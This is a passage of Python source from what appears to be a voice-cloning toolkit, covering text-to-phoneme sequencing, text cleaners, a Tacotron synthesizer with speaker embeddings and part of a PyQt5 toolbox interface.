s in enumerate(symbols)} # Regular expression matching text enclosed in curly braces: _curly_re = re.compile(r"(.*?)\{(.+?)\}(.*)") def text_to_sequence(text, cleaner_names): """Converts a string of text to a sequence of IDs corresponding to the symbols in the text. The text can optionally have ARPAbet sequences enclosed in curly braces embedded in it. For example, "Turn left on {HH AW1 S S T AH0 N} Street." Args: text: string to convert to a sequence cleaner_names: names of the cleaner functions to run the text through Returns: List of integers corresponding to the symbols in the text """ sequence = [] # Check for curly braces and treat their contents as ARPAbet: while len(text): m = _curly_re.match(text) if not m: sequence += _symbols_to_sequence(_clean_text(text, cleaner_names)) break sequence += _symbols_to_sequence(_clean_text(m.group(1), cleaner_names)) sequence += _arpabet_to_sequence(m.group(2)) text = m.group(3) # Append EOS token sequence.append(_symbol_to_id["~"]) return sequence def sequence_to_text(sequence): """Converts a sequence of IDs back to a string""" result = "" for symbol_id in sequence: if symbol_id in _id_to_symbol: s = _id_to_symbol[symbol_id] # Enclose ARPAbet back in curly braces: if len(s) > 1 and s[0] == "@": s = "{%s}" % s[1:] result += s return result.replace("}{", " ") def _clean_text(text, cleaner_names): for name in cleaner_names: cleaner = getattr(cleaners, name) if not cleaner: raise Exception("Unknown cleaner: %s" % name) text = cleaner(text) return text def _symbols_to_sequence(symbols): return [_symbol_to_id[s] for s in symbols if _should_keep_symbol(s)] def _arpabet_to_sequence(text): return _symbols_to_sequence(["@" + s for s in text.split()]) def _should_keep_symbol(s): return s in _symbol_to_id and s not in ("_", "~") File: synthesizer/utils/cleaners.py """ Cleaners are transformations that run over the input text at both training and eval time. Cleaners can be selected by passing a comma-delimited list of cleaner names as the "cleaners" hyperparameter. Some cleaners are English-specific. You"ll typically want to use: 1. "english_cleaners" for English text 2. "transliteration_cleaners" for non-English text that can be transliterated to ASCII using the Unidecode library (https://pypi.python.org/pypi/Unidecode) 3. "basic_cleaners" if you do not want to transliterate (in this case, you should also update the symbols in symbols.py to match your data). """ import re from unidecode import unidecode from synthesizer.utils.numbers import normalize_numbers # Regular expression matching whitespace: _whitespace_re = re.compile(r"\s+") # List of (regular expression, replacement) pairs for abbreviations: _abbreviations = [(re.compile("\\b%s\\." % x[0], re.IGNORECASE), x[1]) for x in [ ("mrs", "misess"), ("mr", "mister"), ("dr", "doctor"), ("st", "saint"), ("co", "company"), ("jr", "junior"), ("maj", "major"), ("gen", "general"), ("drs", "doctors"), ("rev", "reverend"), ("lt", "lieutenant"), ("hon", "honorable"), ("sgt", "sergeant"), ("capt", "captain"), ("esq", "esquire"), ("ltd", "limited"), ("col", "colonel"), ("ft", "fort"), ]] def expand_abbreviations(text): for regex, replacement in _abbreviations: text = re.sub(regex, replacement, text) return text def expand_numbers(text): return normalize_numbers(text) def lowercase(text): """lowercase input tokens.""" return text.lower() def collapse_whitespace(text): return re.sub(_whitespace_re, " ", text) def convert_to_ascii(text): return unidecode(text) def basic_cleaners(text): """Basic pipeline that lowercases and collapses whitespace without transliteration.""" text = lowercase(text) text = collapse_whitespace(text) return text def transliteration_cleaners(text): """Pipeline for non-English text that transliterates to ASCII.""" text = convert_to_ascii(text) text = lowercase(text) text = collapse_whitespace(text) return text def english_cleaners(text): """Pipeline for English text, including number and abbreviation expansion.""" text = convert_to_ascii(text) text = lowercase(text) text = expand_numbers(text) text = expand_abbreviations(text) text = collapse_whitespace(text) return text File: synthesizer/models/tacotron.py import os import numpy as np import torch import torch.nn as nn import torch.nn.functional as F from pathlib import Path from typing import Union class HighwayNetwork(nn.Module): def __init__(self, size): super().__init__() self.W1 = nn.Linear(size, size) self.W2 = nn.Linear(size, size) self.W1.bias.data.fill_(0.) def forward(self, x): x1 = self.W1(x) x2 = self.W2(x) g = torch.sigmoid(x2) y = g * F.relu(x1) + (1. - g) * x return y class Encoder(nn.Module): def __init__(self, embed_dims, num_chars, encoder_dims, K, num_highways, dropout): super().__init__() prenet_dims = (encoder_dims, encoder_dims) cbhg_channels = encoder_dims self.embedding = nn.Embedding(num_chars, embed_dims) self.pre_net = PreNet(embed_dims, fc1_dims=prenet_dims[0], fc2_dims=prenet_dims[1], dropout=dropout) self.cbhg = CBHG(K=K, in_channels=cbhg_channels, channels=cbhg_channels, proj_channels=[cbhg_channels, cbhg_channels], num_highways=num_highways) def forward(self, x, speaker_embedding=None): x = self.embedding(x) x = self.pre_net(x) x.transpose_(1, 2) x = self.cbhg(x) if speaker_embedding is not None: x = self.add_speaker_embedding(x, speaker_embedding) return x def add_speaker_embedding(self, x, speaker_embedding): # SV2TTS # The input x is the encoder output and is a 3D tensor with size (batch_size, num_chars, tts_embed_dims) # When training, speaker_embedding is also a 2D tensor with size (batch_size, speaker_embedding_size) # (for inference, speaker_embedding is a 1D tensor with size (speaker_embedding_size)) # This concats the speaker embedding for each char in the encoder output # Save the dimensions as human-readable names batch_size = x.size()[0] num_chars = x.size()[1] if speaker_embedding.dim() == 1: idx = 0 else: idx = 1 # Start by making a copy of each speaker embedding to match the input text length # The output of this has size (batch_size, num_chars * tts_embed_dims) speaker_embedding_size = speaker_embedding.size()[idx] e = speaker_embedding.repeat_interleave(num_chars, dim=idx) # Reshape it and transpose e = e.reshape(batch_size, speaker_embedding_size, num_chars) e = e.transpose(1, 2) # Concatenate the tiled speaker embedding with the encoder output x = torch.cat((x, e), 2) return x class BatchNormConv(nn.Module): def __init__(self, in_channels, out_channels, kernel, relu=True): super().__init__() self.conv = nn.Conv1d(in_channels, out_channels, kernel, stride=1, padding=kernel // 2, bias=False) self.bnorm = nn.BatchNorm1d(out_channels) self.relu = relu def forward(self, x): x = self.conv(x) x = F.relu(x) if self.relu is True else x return self.bnorm(x) class CBHG(nn.Module): def __init__(self, K, in_channels, channels, proj_channels, num_highways): super().__init__() # List of all rnns to call `flatten_parameters()` on self._to_flatten = [] self.bank_kernels = [i for i in range(1, K + 1)] self.conv1d_bank = nn.ModuleList() for k in self.bank_kernels: conv = BatchNormConv(in_channels, channels, k) self.conv1d_bank.append(conv) self.maxpool = nn.MaxPool1d(kernel_size=2, stride=1, padding=1) self.conv_project1 = BatchNormConv(len(self.bank_kernels) * channels, proj_channels[0], 3) self.conv_project2 = BatchNormConv(proj_channels[0], proj_channels[1], 3, relu=False) # Fix the highway input if necessary if proj_channels[-1] != channels: self.highway_mismatch = True self.pre_highway = nn.Linear(proj_channels[-1], channels, bias=False) else: self.highway_mismatch = False self.highways = nn.ModuleList() for i in range(num_highways): hn = HighwayNetwork(channels) self.highways.append(hn) self.rnn = nn.GRU(channels, channels // 2, batch_first=True, bidirectional=True) self._to_flatten.append(self.rnn) # Avoid fragmentation of RNN parameters and associated warning self._flatten_parameters() def forward(self, x): # Although we `_flatten_parameters()` on init, when using DataParallel # the model gets replicated, making it no longer guaranteed that the # weights are contiguous in GPU memory. Hence, we must call it again self._flatten_parameters() # Save these for later residual = x seq_len = x.size(-1) conv_bank = [] # Convolution Bank for conv in self.conv1d_bank: c = conv(x) # Convolution conv_bank.append(c[:, :, :seq_len]) # Stack along the channel axis conv_bank = torch.cat(conv_bank, dim=1) # dump the last padding to fit residual x = self.maxpool(conv_bank)[:, :, :seq_len] # Conv1d projections x = self.conv_project1(x) x = self.conv_project2(x) # Residual Connect x = x + residual # Through the highways x = x.transpose(1, 2) if self.highway_mismatch is True: x = self.pre_highway(x) for h in self.highways: x = h(x) # And then the RNN x, _ = self.rnn(x) return x def _flatten_parameters(self): """Calls `flatten_parameters` on all the rnns used by the WaveRNN. Used to improve efficiency and avoid PyTorch yelling at us.""" [m.flatten_parameters() for m in self._to_flatten] class PreNet(nn.Module): def __init__(self, in_dims, fc1_dims=256, fc2_dims=128, dropout=0.5): super().__init__() self.fc1 = nn.Linear(in_dims, fc1_dims) self.fc2 = nn.Linear(fc1_dims, fc2_dims) self.p = dropout def forward(self, x): x = self.fc1(x) x = F.relu(x) x = F.dropout(x, self.p, training=True) x = self.fc2(x) x = F.relu(x) x = F.dropout(x, self.p, training=True) return x class Attention(nn.Module): def __init__(self, attn_dims): super().__init__() self.W = nn.Linear(attn_dims, attn_dims, bias=False) self.v = nn.Linear(attn_dims, 1, bias=False) def forward(self, encoder_seq_proj, query, t): # print(encoder_seq_proj.shape) # Transform the query vector query_proj = self.W(query).unsqueeze(1) # Compute the scores u = self.v(torch.tanh(encoder_seq_proj + query_proj)) scores = F.softmax(u, dim=1) return scores.transpose(1, 2) class LSA(nn.Module): def __init__(self, attn_dim, kernel_size=31, filters=32): super().__init__() self.conv = nn.Conv1d(1, filters, padding=(kernel_size - 1) // 2, kernel_size=kernel_size, bias=True) self.L = nn.Linear(filters, attn_dim, bias=False) self.W = nn.Linear(attn_dim, attn_dim, bias=True) # Include the attention bias in this term self.v = nn.Linear(attn_dim, 1, bias=False) self.cumulative = None self.attention = None def init_attention(self, encoder_seq_proj): device = next(self.parameters()).device # use same device as parameters b, t, c = encoder_seq_proj.size() self.cumulative = torch.zeros(b, t, device=device) self.attention = torch.zeros(b, t, device=device) def forward(self, encoder_seq_proj, query, t, chars): if t == 0: self.init_attention(encoder_seq_proj) processed_query = self.W(query).unsqueeze(1) location = self.cumulative.unsqueeze(1) processed_loc = self.L(self.conv(location).transpose(1, 2)) u = self.v(torch.tanh(processed_query + encoder_seq_proj + processed_loc)) u = u.squeeze(-1) # Mask zero padding chars u = u * (chars != 0).float() # Smooth Attention # scores = torch.sigmoid(u) / torch.sigmoid(u).sum(dim=1, keepdim=True) scores = F.softmax(u, dim=1) self.attention = scores self.cumulative = self.cumulative + self.attention return scores.unsqueeze(-1).transpose(1, 2) class Decoder(nn.Module): # Class variable because its value doesn't change between classes # yet ought to be scoped by class because its a property of a Decoder max_r = 20 def __init__(self, n_mels, encoder_dims, decoder_dims, lstm_dims, dropout, speaker_embedding_size): super().__init__() self.register_buffer("r", torch.tensor(1, dtype=torch.int)) self.n_mels = n_mels prenet_dims = (decoder_dims * 2, decoder_dims * 2) self.prenet = PreNet(n_mels, fc1_dims=prenet_dims[0], fc2_dims=prenet_dims[1], dropout=dropout) self.attn_net = LSA(decoder_dims) self.attn_rnn = nn.GRUCell(encoder_dims + prenet_dims[1] + speaker_embedding_size, decoder_dims) self.rnn_input = nn.Linear(encoder_dims + decoder_dims + speaker_embedding_size, lstm_dims) self.res_rnn1 = nn.LSTMCell(lstm_dims, lstm_dims) self.res_rnn2 = nn.LSTMCell(lstm_dims, lstm_dims) self.mel_proj = nn.Linear(lstm_dims, n_mels * self.max_r, bias=False) self.stop_proj = nn.Linear(encoder_dims + speaker_embedding_size + lstm_dims, 1) def zoneout(self, prev, current, p=0.1): device = next(self.parameters()).device # Use same device as parameters mask = torch.zeros(prev.size(), device=device).bernoulli_(p) return prev * mask + current * (1 - mask) def forward(self, encoder_seq, encoder_seq_proj, prenet_in, hidden_states, cell_states, context_vec, t, chars): # Need this for reshaping mels batch_size = encoder_seq.size(0) # Unpack the hidden and cell states attn_hidden, rnn1_hidden, rnn2_hidden = hidden_states rnn1_cell, rnn2_cell = cell_states # PreNet for the Attention RNN prenet_out = self.prenet(prenet_in) # Compute the Attention RNN hidden state attn_rnn_in = torch.cat([context_vec, prenet_out], dim=-1) attn_hidden = self.attn_rnn(attn_rnn_in.squeeze(1), attn_hidden) # Compute the attention scores scores = self.attn_net(encoder_seq_proj, attn_hidden, t, chars) # Dot product to create the context vector context_vec = scores @ encoder_seq context_vec = context_vec.squeeze(1) # Concat Attention RNN output w. Context Vector & project x = torch.cat([context_vec, attn_hidden], dim=1) x = self.rnn_input(x) # Compute first Residual RNN rnn1_hidden_next, rnn1_cell = self.res_rnn1(x, (rnn1_hidden, rnn1_cell)) if self.training: rnn1_hidden = self.zoneout(rnn1_hidden, rnn1_hidden_next) else: rnn1_hidden = rnn1_hidden_next x = x + rnn1_hidden # Compute second Residual RNN rnn2_hidden_next, rnn2_cell = self.res_rnn2(x, (rnn2_hidden, rnn2_cell)) if self.training: rnn2_hidden = self.zoneout(rnn2_hidden, rnn2_hidden_next) else: rnn2_hidden = rnn2_hidden_next x = x + rnn2_hidden # Project Mels mels = self.mel_proj(x) mels = mels.view(batch_size, self.n_mels, self.max_r)[:, :, :self.r] hidden_states = (attn_hidden, rnn1_hidden, rnn2_hidden) cell_states = (rnn1_cell, rnn2_cell) # Stop token prediction s = torch.cat((x, context_vec), dim=1) s = self.stop_proj(s) stop_tokens = torch.sigmoid(s) return mels, scores, hidden_states, cell_states, context_vec, stop_tokens class Tacotron(nn.Module): def __init__(self, embed_dims, num_chars, encoder_dims, decoder_dims, n_mels, fft_bins, postnet_dims, encoder_K, lstm_dims, postnet_K, num_highways, dropout, stop_threshold, speaker_embedding_size): super().__init__() self.n_mels = n_mels self.lstm_dims = lstm_dims self.encoder_dims = encoder_dims self.decoder_dims = decoder_dims self.speaker_embedding_size = speaker_embedding_size self.encoder = Encoder(embed_dims, num_chars, encoder_dims, encoder_K, num_highways, dropout) self.encoder_proj = nn.Linear(encoder_dims + speaker_embedding_size, decoder_dims, bias=False) self.decoder = Decoder(n_mels, encoder_dims, decoder_dims, lstm_dims, dropout, speaker_embedding_size) self.postnet = CBHG(postnet_K, n_mels, postnet_dims, [postnet_dims, fft_bins], num_highways) self.post_proj = nn.Linear(postnet_dims, fft_bins, bias=False) self.init_model() self.num_params() self.register_buffer("step", torch.zeros(1, dtype=torch.long)) self.register_buffer("stop_threshold", torch.tensor(stop_threshold, dtype=torch.float32)) @property def r(self): return self.decoder.r.item() @r.setter def r(self, value): self.decoder.r = self.decoder.r.new_tensor(value, requires_grad=False) def forward(self, x, m, speaker_embedding): device = next(self.parameters()).device # use same device as parameters self.step += 1 batch_size, _, steps = m.size() # Initialise all hidden states and pack into tuple attn_hidden = torch.zeros(batch_size, self.decoder_dims, device=device) rnn1_hidden = torch.zeros(batch_size, self.lstm_dims, device=device) rnn2_hidden = torch.zeros(batch_size, self.lstm_dims, device=device) hidden_states = (attn_hidden, rnn1_hidden, rnn2_hidden) # Initialise all lstm cell states and pack into tuple rnn1_cell = torch.zeros(batch_size, self.lstm_dims, device=device) rnn2_cell = torch.zeros(batch_size, self.lstm_dims, device=device) cell_states = (rnn1_cell, rnn2_cell) # <GO> Frame for start of decoder loop go_frame = torch.zeros(batch_size, self.n_mels, device=device) # Need an initial context vector context_vec = torch.zeros(batch_size, self.encoder_dims + self.speaker_embedding_size, device=device) # SV2TTS: Run the encoder with the speaker embedding # The projection avoids unnecessary matmuls in the decoder loop encoder_seq = self.encoder(x, speaker_embedding) encoder_seq_proj = self.encoder_proj(encoder_seq) # Need a couple of lists for outputs mel_outputs, attn_scores, stop_outputs = [], [], [] # Run the decoder loop for t in range(0, steps, self.r): prenet_in = m[:, :, t - 1] if t > 0 else go_frame mel_frames, scores, hidden_states, cell_states, context_vec, stop_tokens = \ self.decoder(encoder_seq, encoder_seq_proj, prenet_in, hidden_states, cell_states, context_vec, t, x) mel_outputs.append(mel_frames) attn_scores.append(scores) stop_outputs.extend([stop_tokens] * self.r) # Concat the mel outputs into sequence mel_outputs = torch.cat(mel_outputs, dim=2) # Post-Process for Linear Spectrograms postnet_out = self.postnet(mel_outputs) linear = self.post_proj(postnet_out) linear = linear.transpose(1, 2) # For easy visualisation attn_scores = torch.cat(attn_scores, 1) # attn_scores = attn_scores.cpu().data.numpy() stop_outputs = torch.cat(stop_outputs, 1) return mel_outputs, linear, attn_scores, stop_outputs def generate(self, x, speaker_embedding=None, steps=2000): self.eval() device = next(self.parameters()).device # use same device as parameters batch_size, _ = x.size() # Need to initialise all hidden states and pack into tuple for tidyness attn_hidden = torch.zeros(batch_size, self.decoder_dims, device=device) rnn1_hidden = torch.zeros(batch_size, self.lstm_dims, device=device) rnn2_hidden = torch.zeros(batch_size, self.lstm_dims, device=device) hidden_states = (attn_hidden, rnn1_hidden, rnn2_hidden) # Need to initialise all lstm cell states and pack into tuple for tidyness rnn1_cell = torch.zeros(batch_size, self.lstm_dims, device=device) rnn2_cell = torch.zeros(batch_size, self.lstm_dims, device=device) cell_states = (rnn1_cell, rnn2_cell) # Need a <GO> Frame for start of decoder loop go_frame = torch.zeros(batch_size, self.n_mels, device=device) # Need an initial context vector context_vec = torch.zeros(batch_size, self.encoder_dims + self.speaker_embedding_size, device=device) # SV2TTS: Run the encoder with the speaker embedding # The projection avoids unnecessary matmuls in the decoder loop encoder_seq = self.encoder(x, speaker_embedding) encoder_seq_proj = self.encoder_proj(encoder_seq) # Need a couple of lists for outputs mel_outputs, attn_scores, stop_outputs = [], [], [] # Run the decoder loop for t in range(0, steps, self.r): prenet_in = mel_outputs[-1][:, :, -1] if t > 0 else go_frame mel_frames, scores, hidden_states, cell_states, context_vec, stop_tokens = \ self.decoder(encoder_seq, encoder_seq_proj, prenet_in, hidden_states, cell_states, context_vec, t, x) mel_outputs.append(mel_frames) attn_scores.append(scores) stop_outputs.extend([stop_tokens] * self.r) # Stop the loop when all stop tokens in batch exceed threshold if (stop_tokens > 0.5).all() and t > 10: break # Concat the mel outputs into sequence mel_outputs = torch.cat(mel_outputs, dim=2) # Post-Process for Linear Spectrograms postnet_out = self.postnet(mel_outputs) linear = self.post_proj(postnet_out) linear = linear.transpose(1, 2) # For easy visualisation attn_scores = torch.cat(attn_scores, 1) stop_outputs = torch.cat(stop_outputs, 1) self.train() return mel_outputs, linear, attn_scores def init_model(self): for p in self.parameters(): if p.dim() > 1: nn.init.xavier_uniform_(p) def get_step(self): return self.step.data.item() def reset_step(self): # assignment to parameters or buffers is overloaded, updates internal dict entry self.step = self.step.data.new_tensor(1) def log(self, path, msg): with open(path, "a") as f: print(msg, file=f) def load(self, path, optimizer=None): # Use device of model params as location for loaded state device = next(self.parameters()).device checkpoint = torch.load(str(path), map_location=device) self.load_state_dict(checkpoint["model_state"]) if "optimizer_state" in checkpoint and optimizer is not None: optimizer.load_state_dict(checkpoint["optimizer_state"]) def save(self, path, optimizer=None): if optimizer is not None: torch.save({ "model_state": self.state_dict(), "optimizer_state": optimizer.state_dict(), }, str(path)) else: torch.save({ "model_state": self.state_dict(), }, str(path)) def num_params(self, print_out=True): parameters = filter(lambda p: p.requires_grad, self.parameters()) parameters = sum([np.prod(p.size()) for p in parameters]) / 1_000_000 if print_out: print("Trainable Parameters: %.3fM" % parameters) return parameters File: toolbox/utterance.py from collections import namedtuple Utterance = namedtuple("Utterance", "name speaker_name wav spec embed partial_embeds synth") Utterance.__eq__ = lambda x, y: x.name == y.name Utterance.__hash__ = lambda x: hash(x.name) File: toolbox/ui.py import sys from pathlib import Path from time import sleep from typing import List, Set from warnings import filterwarnings, warn import matplotlib.pyplot as plt import numpy as np import sounddevice as sd import soundfile as sf import umap from PyQt5.QtCore import Qt, QStringListModel from PyQt5.QtWidgets import * from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas from encoder.inference import plot_embedding_as_heatmap from toolbox.utterance import Utterance filterwarnings("ignore") colormap = np.array([ [0, 127, 70], [255, 0, 0], [255, 217, 38], [0, 135, 255], [165, 0, 165], [255, 167, 255], [97, 142, 151], [0, 255, 255], [255, 96, 38], [142, 76, 0], [33, 0, 127], [0, 0, 0], [183, 183, 183], [76, 255, 0], ], dtype=np.float) / 255 default_text = \ "Welcome to the toolbox! To begin, load an utterance from your datasets or record one " \ "yourself.\nOnce its embedding has been created, you can synthesize any text written here.\n" \ "The synthesizer expects to generate " \ "outputs that are somewhere between 5 and 12 seconds.\nTo mark breaks, write a new line. " \ "Each line will be treated separately.\nThen, they are joined together to make the final " \ "spectrogram. Use the vocoder to generate audio.\nThe vocoder generates almost in constant " \ "time, so it will be more time efficient for longer inputs like this one.\nOn the left you " \ "have the embedding projections. Load or record more utterances to see them.\nIf you have " \ "at least 2 or 3 utterances from a same speaker, a cluster should form.\nSynthesized " \ "utterances are of the same color as the speaker whose voice was used, but they're " \ "represented with a cross." class UI(QDialog): min_umap_points = 4 max_log_lines = 5 max_saved_utterances = 20 def draw_utterance(self, utterance: Utterance, which): self.draw_spec(utterance.spec, which) self.draw_embed(utterance.embed, utterance.name, which) def draw_embed(self, embed, name, which): embed_ax, _ = self.current_ax if which == "current" else self.gen_ax embed_ax.figure.suptitle("" if embed is None else name) ## Embedding # Clear the plot if len(embed_ax.images) > 0: embed_ax.images[0].colorbar.remove() embed_ax.clear() # Draw the embed if embed is not None: plot_embedding_as_heatmap(embed, embed_ax) embed_ax.set_title("embedding") embed_ax.set_aspect("equal", "datalim") embed_ax.set_xticks([]) embed_ax.set_yticks([]) embed_ax.figure.canvas.draw() def draw_spec(self, spec, which): _, spec_ax = self.current_ax if which == "current" else self.gen_ax ## Spectrogram # Draw the spectrogram spec_ax.clear() if spec is not None: spec_ax.imshow(spec, aspect="auto", interpolation="none") spec_ax.set_title("mel spectrogram") spec_ax.set_xticks([]) spec_ax.set_yticks([]) spec_ax.figure.canvas.draw() if which != "current": self.vocode_button.setDisabled(spec is None) def draw_umap_projections(self, utterances: Set[Utterance]): self.umap_ax.clear() speakers = np.unique([u.speaker_name for u in utterances]) colors = {speaker_name: colormap[i] for i, speaker_name in enumerate(speakers)} embeds = [u.embed for u in utterances] # Display a message if there aren't enough points if len(utterances) < self.min_umap_points: self.umap_ax.text(.5, .5, "Add %d more points to\ngenerate the projections" % (self.min_umap_points - len(utterances)), horizontalalignment='center', fontsize=15) self.umap_ax.set_title("") # Compute the projections else: if not self.umap_hot: self.log( "Drawing UMAP projections for the first time, this will take a few seconds.") self.umap_hot = True reducer = umap.UMAP(int(np.ceil(np.sqrt(len(embeds)))), metric="cosine") projections = reducer.fit_transform(embeds) speakers_done = set() for projection, utterance in zip(projections, utterances): color = colors[utterance.speaker_name] mark = "x" if "_gen_" in utterance.name else "o" label = None if utterance.speaker_name in speakers_done else utterance.speaker_name speakers_done.add(utterance.speaker_name) self.umap_ax.scatter(projection[0], projection[1], c=[color], marker=mark, label=label) self.umap_ax.legend(prop={'size': 10}) # Draw the plot self.umap_ax.set_aspect("equal", "datalim") self.umap_ax.set_xticks([]) self.umap_ax.set_yticks([]) self.umap_ax.figure.canvas.draw() def save_audio_file(self, wav, sample_rate): dialog = QFileDialog() dialog.setDefaultSuffix(".wav") fpath, _ = dialog.getSaveFileName( parent=self, caption="Select a path to save the audio file", filter="Audio Files (*.flac *.wav)" ) if fpath: #Default format is wav if Path(fpath).suffix == "": fpath += ".wav" sf.write(fpath, wav, sample_rate) def setup_audio_devices(self, sample_rate): input_devices = [] output_devices = [] for device in sd.query_devices(): # Check if valid input try: sd.check_input_settings(device=device["name"], samplerate=sample_rate) input_devices.append(device["name"]) except: pass # Check if valid output try: sd.check_output_settings(device=device["name"], samplerate=sample_rate) output_devices.append(device["name"]) except Exception as e: # Log a warning only if the device is not an input if not device["name"] in input_devices: warn("Unsupported output device %s for the sample rate: %d \nError: %s" % (device["name"], sample_rate, str(e))) if len(input_devices) == 0: self.log("No audio input device detected. Recording may not work.") self.audio_in_device = None else: self.audio_in_device = input_devices[0] if len(output_devices) == 0: self.log("No supported output audio devices were found! Audio output may not work.") self.audio_out_devices_cb.addItems(["None"]) self.audio_out_devices_cb.setDisabled(True) else: self.audio_out_devices_cb.clear() self.audio_out_devices_cb.addItems(output_devices) self.audio_out_devices_cb.currentTextChanged.connect(self.set_audio_device) self.set_audio_device() def set_audio_device(self): output_device = self.audio_out_devices_cb.currentText() if output_device == "None": output_device = None # If None, sounddevice queries portaudio sd.default.device = (self.audio_in_device, output_device) def play(self, wav, sample_rate): try: sd.stop() sd.play(wav, sample_rate) except Exception as e: print(e) self.log("Error in audio playback. Try selecting a different audio output device.") self.log("Your device must be connected before you start the toolbox.") def stop(self): sd.stop() def record_one(self, sample_rate, duration): self.record_button.setText("Recording...") self.record_button.setDisabled(True) self.log("Recording %d seconds of audio" % duration) sd.stop() try: wav = sd.rec(duration * sample_rate, sample_rate, 1) except Exception as e: print(e) self.log("Could not record anything. Is your recording device enabled?") self.log("Your device must be connected before you start the toolbox.") return None for i in np.arange(0, duration, 0.1): self.set_loading(i, duration) sleep(0.1) self.set_loading(duration, duration) sd.wait() self.log("Done recording.") self.record_button.setText("Record") self.record_button.setDisabled(False) return wav.squeeze() @property def current_dataset_name(self): return self.dataset_box.currentText() @property def current_speaker_name(self): return self.speaker_box.currentText() @property def current_utterance_name(self): return self.utterance_box.currentText() def browse_file(self): fpath = QFileDialog().getOpenFileName( parent=self, caption="Select an audio file", filter="Audio Files (*.mp3 *.flac *.wav *.m4a)" ) return Path(fpath[0]) if fpath[0] != "" else "" @staticmethod def repopulate_box(box, items, random=False): """ Resets a box and adds a list of items. Pass a list of (item, data) pairs instead to join data to the items """ box.blockSignals(True) box.clear() for item in items: item = list(item) if isinstance(item, tuple) else [item] box.addItem(str(item[0]), *item[1:]) if len(items) > 0: box.setCurrentIndex(np.random.randint(len(items)) if random else 0) box.setDisabled(len(items) == 0) box.blockSignals(False) def populate_browser(self, datasets_root: Path, recognized_datasets: List, level: int, random=True): # Select a random dataset if level <= 0: if datasets_root is not None: datasets = [datasets_root.joinpath(d) for d in recognized_datasets] datasets = [d.relative_to(datasets_root) for d in datasets if d.exists()] self.browser_load_button.setDisabled(len(datasets) == 0) if datasets_root is None or len(datasets) == 0: msg = "Warning: you d" + ("id not pass a root directory for datasets as argument" \ if datasets_root is None else "o not have any of the recognized datasets" \ " in %s" % datasets_root) self.log(msg) msg += ".\nThe recognized datasets are:\n\t%s\nFeel free to add your own. You " \ "can still use the toolbox by recording samples yourself." % \ ("\n\t".join(recognized_datasets)) print(msg, file=sys.stderr) self.random_utterance_button.setDisabled(True) self.random_speaker_button.setDisabled(True) self.random_dataset_button.setDisabled(True) self.utterance_box.setDisabled(True) self.speaker_box.setDisabled(True) self.dataset_box.setDisabled(True) self.browser_load_button.setDisabled(True) self.auto_next_checkbox.setDisabled(True) return self.repopulate_box(self.dataset_box, datasets, random) # Select a random speaker if level <= 1: speakers_root = datasets_root.joinpath(self.current_dataset_name) speaker_names = [d.stem for d in speakers_root.glob("*") if d.is_dir()] self.repopulate_box(self.speaker_box, speaker_names, random) # Select a random utterance if level <= 2: utterances_root = datasets_root.joinpath( self.current_dataset_name, self.current_speaker_name ) utterances = [] for extension in ['mp3', 'flac', 'wav', 'm4a']: utterances.extend(Path(utterances_root).glob("**/*.%s" % extension)) utterances = [fpath.relative_to(utterances_root) for fpath in utterances] self.repopulate_box(self.utterance_box, utterances, random) def browser_select_next(self): index = (self.utterance_box.currentIndex() + 1) % len(self.utterance_box) self.utterance_box.setCurrentIndex(index) @property def current_encoder_fpath(self): return self.encoder_box.itemData(self.encoder_box.currentIndex()) @property def current_synthesizer_fpath(self): return self.synthesizer_box.itemData(self.synthesizer_box.currentIndex()) @property def current_vocoder_fpath(self): return self.vocoder_box.itemData(self.vocoder_box.currentIndex()) def populate_models(self, models_dir: Path): # Encoder encoder_fpaths = list(models_dir.glob("*/encoder.pt")) if len(encoder_fpaths) == 0: raise Exception("No encoder models found in %s" % models_dir) self.repopulate_box(self.encoder_box, [(f.parent.name, f) for f in encoder_fpaths]) # Synthesizer synthesizer_fpaths = list(models_dir.glob("*/synthesizer.pt")) if len(synthesizer_fpaths) == 0: raise Exception("No synthesizer models found in %s" % models_dir) self.repopulate_box(self.synthesizer_box, [(f.parent.name, f) for f in synthesizer_fpaths]) # Vocoder vocoder_fpaths = list(models_dir.glob("*/vocoder.pt")) vocoder_items = [(f.parent.name, f) for f in vocoder_fpaths] + [("Griffin-Lim", None)] self.repopulate_box(self.vocoder_box, vocoder_items) @property def selected_utterance(self): return self.utterance_history.itemData(self.utterance_history.currentIndex()) def register_utterance(self, utterance: Utterance): self.utterance_history.blockSignals(True) self.utterance_history.insertItem(0, utterance.name, utterance) self.utterance_history.setCurrentIndex(0) self.utterance_history.blockSignals(False) if len(self.utterance_history) > self.max_saved_utterances: self.utterance_history.removeItem(self.max_saved_utterances) self.play_button.setDisabled(False) self.generate_button.setDisabled(False) self.synthesize_button.setDisabled(False) def log(self, line, mode="newline"): if mode == "newline": self.logs.append(line) if len(self.logs) > self.max_log_lines: del self.logs[0] elif mode == "append": self.logs[-1] += line elif mode == "overwrite": self.logs[-1] = line log_text = '\n'.join(self.logs) self.log_window.setText(log_text) self.app.processEvents() def set_loading(self, value, maximum=1): self.loading_bar.setValue(value * 100) self.loading_bar.setMaximum(maximum * 100) self.loading_bar.setTextVisible(value != 0) self.app.processEvents() def populate_gen_options(self, seed, trim_silences): if seed is not None: self.random_seed_checkbox.setChecked(True) self.seed_textbox.setText(str(seed)) self.seed_textbox.setEnabled(True) else: self.random_seed_checkbox.setChecked(False) self.seed_textbox.setText(str(0)) self.seed_textbox.setEnabled(False) if not trim_silences: self.trim_silences_checkbox.setChecked(False) self.trim_silences_checkbox.setDisabled(True) def update_seed_textbox(self): if self.random_seed_checkbox.isChecked(): self.seed_textbox.setEnabled(True) else: self.seed_textbox.setEnabled(False) def reset_interface(self): self.draw_embed(None, None, "current") self.draw_embed(None, None, "generated") self.draw_spec(None, "current") self.draw_spec(None, "generated") self.draw_umap_projections(set()) self.set_loading(0) self.play_button.setDisabled(True) self.generate_button.setDisabled(True) self.synthesize_button.setDisabled(True) self.vocode_button.setDisabled(True) self.replay_wav_button.setDisabled(True) self.export_wav_button.setDisabled(True) [self.log("") for _ in range(self.max_log_lines)] def __init__(self): ## Initialize the application self.app = QApplication(sys.argv) super().__init__(None) self.setWindowTitle("SV2TTS toolbox") ## Main layouts # Root root_layout = QGridLayout() self.setLayout(root_layout) # Browser browser_layout = QGridLayout() root_layout.addLayout(browser_layout, 0, 0, 1, 2) # Generation gen_layout = QVBoxLayout() root_layout.addLayout(gen_layout, 0, 2, 1, 2) # Projections self.projections_layout = QVBoxLayout() root_layout.addLayout(self.projections_layout, 1, 0, 1, 1) # Visualizations vis_layout = QVBoxLayout() 